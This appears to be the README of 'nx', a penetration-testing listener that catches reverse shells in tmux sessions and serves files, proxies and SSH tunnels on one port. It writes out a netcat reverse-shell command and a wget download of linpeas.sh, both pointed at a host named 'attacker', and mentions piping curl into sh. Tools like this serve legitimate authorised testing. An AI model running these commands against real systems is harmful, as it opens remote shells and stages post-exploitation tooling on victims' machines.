[n]etcat + tmu[x] - listen on a port and forward the stream to a tmux session
All-in-One:
- reverse shell
- http server
- http/s proxy
- port-forwarding-only ssh server
- tmux - required for session/window management
git clone https://github.com/audibleblink/nx
cd nx
go build -o nx .
./nx --install-plugins # Install bundled pluginsgo install github.com/audibleblink/nx@latest
nx --install-plugins # Install bundled pluginsThe --install-plugins flag copies bundled plugins (like auto.sh) to ~/.config/nx/plugins/. This only needs to be run once after installation.
- start a listener
nx -vp 9090- from a different machine, initiate the reverse shell
- nx catches the connection then starts a tmux window in the
nxsession, and starts the shell there
- Plugin system: Use
--exec <plugin>to run custom scripts on connection - Auto-upgrade to TTY: Use
--exec auto(or deprecated--autoflag) to automatically upgrade your shell to a TTY - Protocol multiplexing: Serve files over HTTP, proxy network requests, and SSH tunneling on the same port as reverse shell connections
- SSH tunneling: Support for local (-L) and remote (-R) port forwarding with optional password authentication
- XDG runtime paths: Automatically uses XDG runtime directory for socket location
- Signal handling: Properly handles signals and performs cleanup
nx supports a plugin system for executing custom commands when a new connection is established. Plugins are shell-like scripts stored in ~/.config/nx/plugins/. They're typed letter by letter with tmux send-keys.
- Create a shell script in
~/.config/nx/plugins/<name>.sh - Use the plugin:
nx --exec <name>
Plugins are simple text scripts that are literally typed into your reverse shell:
- Lines starting with
#are ignored (comments) - Empty lines are ignored
- All other lines are executed as tmux
send-keyscommands in the reverse shell
#!/bin/bash
# Custom upgrade script
echo "Setting up environment..."
export PATH=/usr/local/bin:$PATH
whoami- auto: TTY upgrade script
- utils: some QoL
- install with
nx --install-plugins
nx can serve files over HTTP, act as an HTTP proxy, and provide SSH tunneling on the same port as shell connections. This allows you to serve files, create SSH tunnels, provide internet to air-gapped machines, and catch shells over a single port.
Enable file serving by specifying a directory with the -d or --serve-dir flag:
# Start nx with file serving enabled
nx -p 8443 -d ./files -v
# Shell connections still work normally
nc -e /bin/bash attacker 8443
# From target machine - download files
wget http://attacker:8443/linpeas.sh
nx supports SSH tunneling for port forwarding without providing shell access.
# Start nx with SSH tunneling (no password)
nx -p 8443 -v
# Start nx with SSH password authentication
nx -p 8443 -s mypassword -v
# From client - Local port forwarding (-L)
ssh -L 8080:internal-server:80 -N user@attacker -p 8443
# From client - Remote port forwarding (-R)
ssh -R 9090:localhost:22 -N user@attacker -p 8443unix domain sockets mannn
-
maybe a plugin system for sending commands on connection✅ DONE: Implemented plugin system with--execflag -
some mechanism to auto-upgrade the shell to a TTY via tmux-send-keys or sourcing a script that just adds the keybinds, so that it's up to the user to fire off the upgrade✅ DONE: Auto-upgrade via--exec auto -
alternatively, multiplex the connection to allow✅ DONE: Protocol multiplexing withcurl | shfrom the same port--serve-dir -
multiplexing listener✅ DONE: HTTP/shell protocol detection on same port -
super simple chisel-light functionality✅ DONE: SSH tunneling with local/remote port forwarding - facilitate installing plugins dir to xdg
- handle stdio with the socket directly with
nx, eliminating the need forsocat
WebDAV protocol support is automatically enabled when using the --serve-dir flag:
# Start server with file serving (WebDAV automatically enabled)
./nx server --serve-dir /path/to/files --port 8443
# Access from Windows Explorer
\\localhost@8443\DavWWWRoot\
# Access from macOS Finder
# Cmd+K, then: http://localhost:8443
# Access from Linux (davfs2)
sudo mount -t davfs http://localhost:8443 /mnt/webdav
# Command-line operations with curl
curl -X PROPFIND http://localhost:8443/ -H "Depth: 1" # List files
curl http://localhost:8443/file.txt # Download
curl -X PUT http://localhost:8443/new.txt --data-binary @local.txt # Upload
curl -X DELETE http://localhost:8443/file.txt # Delete
curl -X MKCOL http://localhost:8443/newdir # Create directoryThe server intelligently detects WebDAV methods (PROPFIND, MKCOL, COPY, MOVE) and routes them appropriately.